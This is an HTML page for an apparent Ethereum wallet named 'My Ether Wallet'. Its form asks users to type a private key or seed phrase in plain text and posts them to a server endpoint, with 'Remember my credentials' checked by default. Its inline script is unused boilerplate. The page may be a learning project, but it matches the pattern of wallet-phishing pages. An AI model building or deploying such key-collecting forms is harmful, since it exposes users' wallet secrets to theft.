<!DOCTYPE html>
<html>

<head>
  <meta name="" content="width=device-width, initial-scale=1">
  <title>My Ether Wallet</title>
  <link rel="stylesheet" href="index.css">

</head>

<body>

  <h2> Ether Wallet</h2>

  <form action="/submit" method="post">
    <div class="imgcontainer">
      <img src="img_avatar1.jpg" alt="Avatar" class="avatar">
    </div>

    <div class="container">

      <label for="privateKey" ><b>Private key</b></label>
      <input type="text" placeholder="Enter your private key" name="privateKey" >
      <h3 class="orheader">Or</h3>
      <label for="seed"><b>Seed phase</b></label>
      <input type="text" placeholder="Enter your seed phase" name="seed">

      <div class="dropdown">
      <button class="dropbtn">Network</button>
       <select class="dropdown-content" name="provider">
        <option value="homestead">Homestead</option>
        <option value="rinkeby">Rinkeby</option>
        <option value="ropsten">Ropsten</option>
        <option value="kovan">Kovan</option>
        <option value="goerli">Goerli</option>
       </select>
       </div>

      <button type="submit">Access</button>
      <label>
        <input type="checkbox" checked="checked" name="remember"> Remember my credentials
      </label>
    </div>
    </form>
    <script>

      function myFunction() {
        document.getElementById("myDropdown").classList.toggle("show");
      }

      function filterFunction() {
        var input, filter, ul, li, a, i;
        input = document.getElementById("myInput");
        filter = input.value.toUpperCase();
        div = document.getElementById("myDropdown");
        a = div.getElementsByTagName("a");
        for (i = 0; i < a.length; i++) {
          txtValue = a[i].textContent || a[i].innerText;
          if (txtValue.toUpperCase().indexOf(filter) > -1) {
            a[i].style.display = "";
          } else {
            a[i].style.display = "none";
          }
        }
      }
    </script>


    <div class="container" style="background-color:#f1f1f1">
      <button type="button" class="cancelbtn">Cancel</button>
      <span class="psw">Dont have a private key? <a href="#">Create a private key</a></span>
    </div>


</body>

</html>